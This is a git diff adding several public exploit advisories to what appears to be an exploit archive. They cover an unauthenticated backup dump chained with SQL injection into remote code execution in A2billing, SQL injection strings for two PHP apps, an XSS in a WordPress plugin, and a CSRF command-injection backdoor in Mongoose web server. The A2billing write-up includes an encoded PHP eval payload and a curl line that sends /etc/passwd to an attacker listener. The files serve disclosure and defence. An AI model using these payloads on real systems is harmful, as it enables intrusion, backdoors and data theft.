diff --git a/files.csv b/files.csv
index 8b891ecc0..37f9626c8 100644
--- a/files.csv
+++ b/files.csv
@@ -9233,7 +9233,7 @@ id,file,description,date,author,platform,type,port
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
-10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
+10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
@@ -15791,6 +15791,7 @@ id,file,description,date,author,platform,type,port
 42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
+42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38395,3 +38396,7 @@ id,file,description,date,author,platform,type,port
 42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
 42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
 42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
+42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0
+42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0
+42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0
+42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42616.txt b/platforms/php/webapps/42616.txt
new file mode 100755
index 000000000..6923f250c
--- /dev/null
+++ b/platforms/php/webapps/42616.txt
@@ -0,0 +1,110 @@
+# Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
+# Vulnerable software : A2billing 2.x
+# Author : Ahmed Sultan (0x4148)
+# Email : 0x4148@gmail.com
+# Home : 0x4148.com
+# Linkedin : https://www.linkedin.com/in/0x4148/
+
+A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance
+
+If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/
+
+1 . backup dump
+Vulnerable code
+File : admin/public/form_data/FG_var_backup.inc
+getpost_ifset(array('name','path','creationdate'));
+
+$HD_Form = new FormHandler("cc_backup","Backup");
+
+$HD_Form -> FG_DEBUG = 0;
+
+if ($form_action!='ask-add')
+check_demo_mode();
+
+if ($form_action == 'add'){
+$backup_file = $path;
+
+if (substr($backup_file,-3)=='.gz'){
+// WE NEED TO GZIP
+$backup_file = substr($backup_file,0,-3);
+$do_gzip=1;
+}
+// Make the backup stuff here and redirect to success page
+//mysqldump -all --databases mya2billing -ua2billinguser
+-pa2billing > /tmp/test.sql
+//pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql
+mya2billing
+
+if (DB_TYPE != 'postgres'){
+$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."'
+-p'".PASS."' > '{$backup_file}'";
+}else{
+$env_var="PGPASSWORD='".PASS."'";
+putenv($env_var);
+$run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}'
+".DBNAME;
+}
+if ($FG_DEBUG == 1 ) echo $run_backup."
";
+>>>> exec($run_backup,$output,$error);
+if ($do_gzip){
+// Compress file
+$run_gzip = GZIP_EXE." '$backup_file'";
+if ($FG_DEBUG == 1 ) echo $run_gzip."
";
+>>>> exec($run_gzip,$output,$error_zip);
+}
+
+File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to :
+http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql
+backup will be found at admin/Public/0x4148.sql
+
+few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else
+
+2 . SQL injection
+File name : ckeckout_process.php
+Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name,
+agent_email_address, item_name, item_id, item_quantity, payment_method,
+cc_type, cc_owner, cc_number, " .
+" cc_expires, orders_status, last_modified, date_purchased,
+orders_date_finished, orders_amount, currency, currency_value) values (" .
+" '".$transaction_data[0][1]."', '".$customer_info[3]."
+".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '".
+$customer_info[0]."', 1, '$pmodule',
+'".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."',
+'".$transaction_data[0][6]."', '".
+$transaction_data[0][7]."', $orderStatus, '".$nowDate."',
+'".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '".
+$currencyObject->get_value($currCurrency)."' )";
+$result = $DBHandle_max -> Execute($Query);
+
+By exploiting this flaw we can insert malicious data into the db using the following query
+transactionID=456789111111 unise//**lecton selinse//**rtect
+1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**-
+-&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
+After sending this request the following payload "" will be injected directly into the
+DB
+
+3 . 
RCE
+after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :)
+
+[root@localhost Public]# curl '
+https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure
+[root@localhost Public]# cat 0x4148.php | grep nailit
+INSERT INTO `cc_payments_agent` VALUES (295,2,'
+','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28
+10:57:10','2016-10-28 10:57:10','2016-10-28
+10:57:10','usd','0.000000'),(296,2,'
+','','balance','',1,'plugnpay','','','7','8',-1,'3.000000','2016-10-28
+10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');
+
+Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x”
+http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener
+
+Exploit timeline :
+01/10/2016 : vulnerability reported to vendor
+06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
+04/09/2017 : Public release
+
+Credits,
+Ahmed Sultan - Cyber Security Analyst @ EG-CERT
\ No newline at end of file
diff --git a/platforms/php/webapps/42617.txt b/platforms/php/webapps/42617.txt
new file mode 100755
index 000000000..22fbddbee
--- /dev/null
+++ b/platforms/php/webapps/42617.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: iGreeting Cards 1.0 - SQL Injection
+# Dork: N/A
+# Date: 04.09.2017
+# Vendor Homepage: http://coryapp.com/
+# Software Link: http://coryapp.com/?product&index
+# Demo: http://coryapp.com/demo/greetingcards/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?index&search&k=[SQL]
+#
+# eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
+#
+# http://localhost/[PATH]/index.php?index&index&p=[SQL]
+#
+# http://localhost/[PATH]/index.php?category&index&id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42618.txt b/platforms/php/webapps/42618.txt
new file mode 100755
index 000000000..113b88cce
--- /dev/null
+++ b/platforms/php/webapps/42618.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS
+# Google Dork: inurl:wp-content/plugins/participants-database/
+# Date: 01-Sep-17
+# Exploit Author: Benjamin Lim
+# Vendor Homepage: https://xnau.com/
+# Software Link: https://wordpress.org/plugins/participants-database/
+# Version: 1.7.5.9
+# Tested on: Kali Linux 2.0
+# CVE : CVE-2017-14126
+
+
+1. Product & Service Introduction:
+==================================
+Participants Database is a Wordpress plugin for managing a database of
+participants, members or volunteers. As of now, the plugin has been
+downloaded 320,000 times and has 10,000+ active installs.
+
+
+2. Technical Details & Description:
+===================================
+Cross site scripting (XSS) vulnerability in the Wordpress Participants
+Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
+the Name parameter.
+The XSS vulnerability is found on the participant signup form input
+textfield. The get_field_value_display() function in
+PDb_FormElement.class.php did not escape HTML special characters, allowing
+an attacker to input javascript. The XSS code will be executed on 2 pages.
+
+1) The "Thank you for signing up" page immediately after submitting the
+form.
+2) The page which is configured to output the list of participants with the
+[pdb_list] shortcode.
+
+
+3. Proof of Concept (PoC):
+==========================
+
+curl -k -F action=signup -F subsource=participants-database -F
+shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
+-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
+first_name= -F last_name=a -F email=a@a.com -F
+mailing_list=No -F submit_button=Submit http://localhost/?page_id=1
+
+To trigger manually, browse to the page, input the following in the form
+and click Sign Up.
+
+First Name:
+Last Name: test
+Email: test@test.com
+
+
+4. Mitigation
+=============
+Update to version 1.7.5.10
+
+
+5. 
Disclosure Timeline
+======================
+2017/09/01 Vendor contacted
+2017/09/02 Vendor responded
+2017/09/03 Update released
+2017/09/06 Advisory released to the public
+
+
+6. Credits & Authors:
+=====================
+Benjamin Lim - [https://limbenjamin.com]
+
+--
+*Benjamin Lim*
+E: mail@limbenjamin.com
+PGP : https://limbenjamin.com/pgp
diff --git a/platforms/php/webapps/42619.txt b/platforms/php/webapps/42619.txt
new file mode 100755
index 000000000..20797769a
--- /dev/null
+++ b/platforms/php/webapps/42619.txt
@@ -0,0 +1,39 @@
+# # # # #
+# Exploit Title: The Car Project 1.0 - SQL Injection
+# Dork: N/A
+# Date: 05.09.2017
+# Vendor Homepage: http://thecarproject.org/
+# Software Link: http://thecarproject.org/thecarproject.zip
+# Demo: http://www.thecarproject.org/cp
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Vulnerable Source:
+#
+#
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/info.php?car_id=[SQL]
+#
+# -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/remote/42614.txt b/platforms/windows/remote/42614.txt
new file mode 100755
index 000000000..38a6a56ea
--- /dev/null
+++ b/platforms/windows/remote/42614.txt
@@ -0,0 +1,198 @@
+[+] Credits: John Page AKA hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
+[+] ISR: apparitionSec
+
+
+
+Vendor:
+===============
+www.cesanta.com
+
+
+
+Product:
+==================
+Mongoose Web Server (Free Edition)
+Mongoose-free-6.5.exe
+Download: https://cesanta.com/binary.html
+
+
+Mongoose - GitHub's most popular embedded web server
+and multi-protocol networking library
+
+Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking library
+with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more.
+
+
+
+Vulnerability Type:
+===================
+CSRF - Command Execution
+
+
+
+CVE Reference:
+==============
+CVE-2017-11567
+
+
+
+Security Issue:
+================
+Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page
+can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then
+executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe.
+Therefore, from my tests commands may become unstable when Mongoose is run as a service.
+
+When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc.
+to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated
+file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested.
+
+This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language
+"pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack.
+
+Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection
+to the server log.
+
+e.g.
+
+GET HTTP/1.1
+
+OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.
+
+
+After Command Injection "Mongoose.conf" will be:
+
+# Mongoose web server configuration file.
+# For detailed description of every option, visit
+# https://github.com/cesanta/Mongoose
+# Lines starting with '#' and empty lines are ignored.
+# To make a change, remove leading '#', modify option's value,
+# save this file and then restart Mongoose.
+
+# access_control_list
+access_log_file C:\Mongoose.access.php <======= BOOM
+# auth_domain mydomain.com
+cgi_interpreter c:\xampp\php\php.exe <====== MUST BE SET
+# cgi_pattern **.cgi$|**.pl$|**.php$
+# dav_auth_file
+# dav_root
+# debug 0
+document_root C:\
+# enable_directory_listing yes
+# error_log_file
+# extra_headers
+# extra_mime_types
+# global_auth_file
+# hide_files_patterns
+# hexdump_file
+index_files Mongoose.access.php <======== BOOM
+# listening_port 8080
+# run_as_user
+# ssi_pattern **.shtml$|**.shtm$
+# ssl_certificate
+# ssl_ca_certificate
+# start_browser yes
+# url_rewrites
+
+
+
+Mongoose log file Command Inject to create backdoor.
+-----------------------------------------------------------
+
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:30 - 127.0.0.1 - GET 400 0 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -
+
+
+Tested Windows 7.
+
+
+
+Exploit/POC:
+=============
+
+1) add backdoor account POC.
+
+
+
+
+
+
+
+
+
+
+2) TELNET x.x.x.x 8080
+GET HTTP/1.1
+
+Enter
+
+Enter
+
+TELNET x.x.x.x 8080
+GET / HTTP/1.1
+
+Enter
+
+Enter
+
+Done, backdoor added!
+
+
+====================
+
+1) run calc.exe POC.
+
+
+
+
+
+
+
+
+
+2) TELNET x.x.x.x 8080
+GET / HTTP/1.1
+
+Enter
+
+Enter
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: July 23, 2017
+Vendor Notification: July 28, 2017
+Vendor Acknowledgement: July 31, 2017
+Vendor Fixed released version 6.9 : September 4, 2017
+September 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file